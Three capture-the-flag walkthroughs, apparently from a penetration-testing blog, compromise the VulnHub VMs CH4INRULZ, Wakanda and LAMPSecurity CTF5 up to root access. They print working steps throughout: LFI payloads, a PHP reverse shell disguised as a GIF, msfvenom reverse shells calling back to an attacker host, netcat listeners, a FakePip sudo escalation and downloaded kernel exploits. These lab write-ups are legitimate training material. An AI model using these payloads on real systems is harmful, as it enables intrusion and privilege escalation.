Hack the CH4INRULZ: 1.0.1 (CTF Challenge)


Hello readers and welcome to another CTF challenge. This VM is made by Frank Tope as you’ll see in the very homepage on the server’s website (his resume). Nice touch, if I might add. Anyhow, you can download this VM from vulnhub here. The aim of this lab is to get root and read the congratulatory message written in the flag.

I would rate the difficulty level of this lab to be intermediate. Although, there were no buffer overflows or unnecessary exploit development, yet it did make us think a little.

Steps Involved:
1.       Port Scanning and IP clutching.
2.       Directory busting port 80.
3.       Directory busting port 8011.
4.       Discovering LFI vulnerability.
5.       Discovering an HTML backup file.
6.       Cracking password hash
7.       Logging in /development
8.       Uploading a PHP shell disguised as GIF file.
9.       Bypassing the check and triggering the file to get a netcat shell.
10.   Privilege escalation to get flag.

Alright then, let’s head into the VM all the way in.
First step is as always, running netdiscover on the VM to grab the IP address. In my case the IP was 192.168.1.103.



Once the IP was found, we ran nmap aggressive scan to enumerate all the open ports.




What was there to wait for after we saw port 80 open! We headed straight into the browser and a webpage got displayed which looked like a single page resume.




After not finding much, we chose to ran directory buster dirb.



Robots.txt seemed interesting at first but it had nothing at all. Another directory was /development. It looked like a testing site since it asked for the authentication.


We then chose to look into port 8011, after finding not much of the info. It looked like a backend to development directory.


We ran one more dirb scan on this port.


We found an interesting directory called /api

We opened it in the browser immediately.


We modified the URL parameter to /api/ but only one api seemed to be working and that was files_api.php



A message said “no parameter called file passed to me.” It gave us a hint that we had to pass a parameter called file.


192.168.1.103:8011/api/files_api.php?file=/etc/passwd


HAHA. They got us. But still there was another thing left to try—by passing parameter through curl.
Curl – X POST –d “file=/etc/passwd” http://192.168.1.103:8011/api/files_api.php

As you can see, LFI is present here!



Now, we tried some methods, put our hands here and there but nothing worked with this LFI.
Meanwhile, another thing that got our attention was the development server. You had a development site, you have a development server, and hence there would be more than one html files or copies of html files (backups).

One such common file is index.html.bak
It was an arrow in the dark but it hit the bullseye!



We saved it and read it using cat utility.



It had a password hash!
It took us no time to copy this in a text files called hash.txt and run John the Ripper on it.




It surely were the credentials to /development authentication.
frank:frank!!!!



And it opened up like a beautiful treasure!



The message on this page said that the uploader tool was only half completed. So, we went to /uploader directory



The uploader had a security check for images only (jpg, png, gif) and a size limitation too.

So, here is what we did.
Traverse to the directory: /usr/share/webshells/php/php-reverse-shell.php
Open it with text editor and add GIF98 in the first line and save this file as shell.gif



Now, what this will do is that it will trick the uploader in believing the file is GIF when in reality, it is a PHP reverse shell.

So, we upload shell.gif using the uploader and the following message was received.



Now, the author said file was uploaded to his uploads path. Let’s get a little perspective here.
Website’s name: Frank’s website
Uploader’s name: Frank uploader.
First message on website: I love patterns
It took a while for us but we guessed it in the end, the upload’s directory would be named frank uploads.
We tried many permutations for this directory like: Frankupload, frankUploads, franksuploads etc. but the one that seemed to hit was FRANKuploads.
This step was tedious and time consuming as there was no straight connection from anywhere to this directory.



Now, all was left to trigger this file.
We know for a fact that double clicking won’t do us any good so we used curl once again to get shell.

We activated netcat on a terminal side by side and typed this following curl command:

Curl –X POST –d “file=/var/www/development/uploader/FRANKuploads/shell.gif” http://192.168.1.103:8011/api/files_api.php



On other terminal, we had activated netcat:

Nc –lvp 1234



As soon as curl triggered the LFI vulnerability and requested for shell.gif, we got a netcat session!
Id
Python –c ‘import pty;pty.spawn(“/bin/bash”);’
Uname –a


After a bit of surfing, we found a Linux Kernel exploit for version 2.6
Searchsploit 15285
Cd Desktop
Cp /usr/share/exploitdb/exploits/linux/local/15285.c  .
Python –m SimpleHTTPServer 80



On our vm shell, we downloaded this exploit, compiled it and ran it to get root!
Cd tmp
Gcc 15285.c –o 15285
Chmod 777 15285
./15285

Voila! We got root!

Cd root
Ls
Cat root.txt


Hack the Wakanda: 1 (CTF Challenge)


Hello friends! Today we are going to take another CTF challenge known as Wakanda and it is another capture the flag challenge provided for practice. So let’s try to break through it. But before please note that you can download it from here.
Security Level: Intermediate
Flags: There are three flags (flag1.txt, flag2.txt, root.txt)
Penetrating Methodologies
§  Network Scanning (Nmap, netdiscover)
§  HTTP service enumeration
§  Exploiting LFI using php filter
§  Decode the base 64 encoded text for password
§  SSH Login
§  Get 1st Flag
§  Finding files owned by devops
§  Overwrite antivirus.py via malicious python code
§  Get netcat session
§  Get 2nd flag
§  Sudo Privilege Escalation
§  Exploit Fake Pip
§  Get the Root access and Capture the 3rd flag
WalkThrough
Let’s start off with scanning the network to find our target.
netdiscover
We found our target –> 192.168.1.124
Our next step is to scan our target with NMAP.
nmap -p- -A 192.168.1.124

The NMAP output shows us that there are 4 ports open: 80 (HTTP), 111 (RPC), 333(SSH), 48920(RPC)
Browsed the URL http://192.168.1.124 and poked around; however we were not able to get any significant clues to move forward  

We didn’t find anything on the webpage so we use dirb to enumerate the directories.
dirb http://192.168.1.124

All the pages that we find in the dirb scan has size zero and we don’t find any content on any of the pages. We take a look at the source page of the index file and we find a “lang” parameter commented inside the page.

We use the “lang” parameter, just like it was shown in the page and find the text has been converted into French. Now we check if the “lang” parameter is vulnerable to LFI.

We are able to exploit the LFI vulnerability using “php://filter/convert.base64-encode” function and access the index page.
curl http://192.168.1.124/?lang=php://filter/convert.base64-encode/resource=index

We decode the base64 encoded string and find the password “Niamey4Ever227!!!”. On the page we find that “mamadou” is the author. We use these credentials to login through ssh on the target machine.

When we login through ssh we get a python IDE prompt. We import pty module, and spawn ‘/bin/bash’ shell. We take a look at home directory for user mamaduo and find the first flag.

Enumerating through the directories, inside /tmp directory we find a file called test. We open it and find nothing interesting, but when we take a closer look at the file we find it that is owned by a devops. Now we find all the files owned by user devops and find a file called “.antivirus.py” inside /srv directory.
find / -user devops 2>/dev/null

Now when we open the python file we find that it is opening and test file and writing “test” inside it. To exploit this, we replace the code with shellcode. First we create a msfvenom payload.
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.134 lport=4444 R

After creating the payload, we open the “. antivirus.py” file and comment out the earlier code and insert our payload without adding “python -c”.

We setup our listener using netcat, we wait for a few minutes for the script to get executed. As soon as the script is executed we get a reverse shell. When we check the UID we find that we spawned a shell for devops. Now we go to /home/devops directory and find the second flag. After getting the second flag we find that we can execute pip is super user without root.

Now there is script called Fakepip (download here), that can be used to exploit this vulnerability.

We download the fakepip script into our system to edit the payload inside.
We edit the payload inside os.system function.

We decode the base64 encoded string and change the IP address to our IP address. Then we again convert the string to base64 and replace the older string with the new one.

We start the python server on our system, so that we can upload the FakePip script into the target machine.
python -m SimpleHTTPServer 80

After we start HTTP server, we download the script on the target machine using wget. Now execute the command as per the instructions given to us on the FakePip readme file.
sudo pip install . --upgrade --force-install

As soon as we run the command we get a reverse shell as root user. We now go to root directory and find the root flag.

Hack the LAMPSecurity: CTF 5 (CTF Challenge)


Hello friends! Today we are going to take another CTF challenge known as LAMPSecurity CTF5 and it is another boot2root challenge provided for practice and its security level is for the beginners. So let’s try to break through it. But before please note that you can download it from here https://www.vulnhub.com/entry/lampsecurity-ctf5,84/
Penetrating Methodologies
  • Network Scanning (Nmap, netdiscover)
  • HTTP service enumeration
  • Identifying exploit for the vulnerable CMS Web application
  • Access CMS admin login page & credentials
  • Generate PHP Backdoor (Msfvenom)
  • Upload and execute the backdoor
  • Reverse connection (Metasploit)
  • Import python one-liner for proper TTY shell
  • Exploiting target (exploit 9479)
  • Get the Root access
WalkThrough
Let’s start off with scanning the network to find our target.


We found our target –> 192.168.1.145
Our next step is to scan our target with NMAP.
nmap -A 192.168.1.145


The NMAP output shows us that there are multiple ports opened .As HTTP service is also running, let’s begin with same first and see what information we get.
Browsed the URL http://192.168.1.145 and we were greeted with Phake Organization heading banner, and with many options to navigate further.



Let’s run nikto tool here to find out more information
nikto -h 192.168.1.145


As we can see that the victim machine is prone to LFI/RFI vulnerability.
Now we will paste this malicious code (as highlighted above), in the URL as follows to exploit LFI vulnerability using the browser http://192.168.1.145/index.php?page=../../../../../../../../../etc/passwd



As we can see from the output above, we have successfully received the output of /etc/passwd in the browser. We can use this content at some time later in the lab (if required)
Click on the Blog tab of the website http://192.168.1.145 and it will redirect us to the URL http://192.168.1.145/~andy/


We got a clue from the Andy Carp’s blog that the site is powered by NanoCMS . NanoCMS is a lightweight CMS based on PHP that is now discontinued. Therefore we searched on the possible vulnerabilities associated with Nano CMS on the internet and was able to get the details from the following URL https://www.securityfocus.com/bid/34508/exploit
The possible vulnerability identified is Password Hash Information Disclosure which allows unrestricted access to the path /data/pagesdata.txt

Let’s try to append the /data/pagesdata.txt with http://192.168.1.145/~andy/ and navigate to the URL http://192.168.1.145/~andy/data/pagesdata.txt .The following content will be seen which contains lot of information .Upon further investigation we found that the Admin password hash is retrieved.


Open the website www.hashkiller.co.uk and decode the MD5 password hash received from above.


As seen the output “shannon” is the password extracted for the user admin.
Navigate to URL http://192.168.1.145/~andy/ page



Click on the Admin login sub-heading under the Login and we will be redirected to http://192.168.1.145/~andy/data/nanoadmin.php



Input the credentials in the Admin login page as follows :
Username: admin
Password : shannon

Upon success, following page will appear



Click on the New page option tab where we should be able to add new content with our own PHP code.


Let’s generate a Reverse PHP shell with the following command
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 -f raw


Copy the code from as shown above . Open the NanoCMS Admin panel of the website , navigate to the New Page option and paste the reverse PHP shell in Content section .Input any name in the Title and click on the Add Page.



Upon clicking on the Add page, the file “shell” has been uploaded successfully , as seen in the screenshot below (under Navigation)


Now in parallel, open the Metasploit console and perform the following

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.134
msf exploit(handler) > set lport 4444
msf exploit(handler) > run



Once we have started the listener on the Kali Linux , click on the shell file in the Andy Carp’s blog. As soon as we click the same , we will get a meterpreter console . From the below image we can observe Meterpreter session 1. But our task is not finished yet, we still need to penetrate further for the privilege escalation.

Using sysinfo command , we found machine architecture details which may eventually help us to find out the kernel exploit for privilege escalation
sysinfo


Searched across the internet to found the privilege escalation exploit that might apply to the Linux kernel version 2.6.23.1-42 and found the below link (as shown in image above).



As we know that version of the kernel is vulnerable, we will download its exploit to the Kali machine from the Exploit DB website, as shown below:
wget https://www.exploit-db.com/download/9479.c
Moving forward, we will compile the file as follows:
gcc -m32 -o exploit 9479.c


Now go back to the Meterpreter session and navigate to /tmp folder
cd /tmp

Send the exploit file from Kali machine Meterpreter session to the target system

upload /root/exploit exploit

Further , navigate to shell

shell

In order to access proper TTY shell , we had imported python one line script by typing following:

python -c 'import pty;pty.spawn("/bin/bash")'

We got the limited shell!! Now let’s try to enumerate further
Proceed forward and go to the tmp folder by typing :
cd /tmp
Let’s see what directories it has and for that type:
ls
Assign the permissions to the exploit, before execution
chmod 777 exploit
Then type the following command to execute the exploit:

env- ./exploit



As soon the exploit executes we will get the root access!!

And to confirm this type:
id



Hurray!! We have successfully solved this challenge.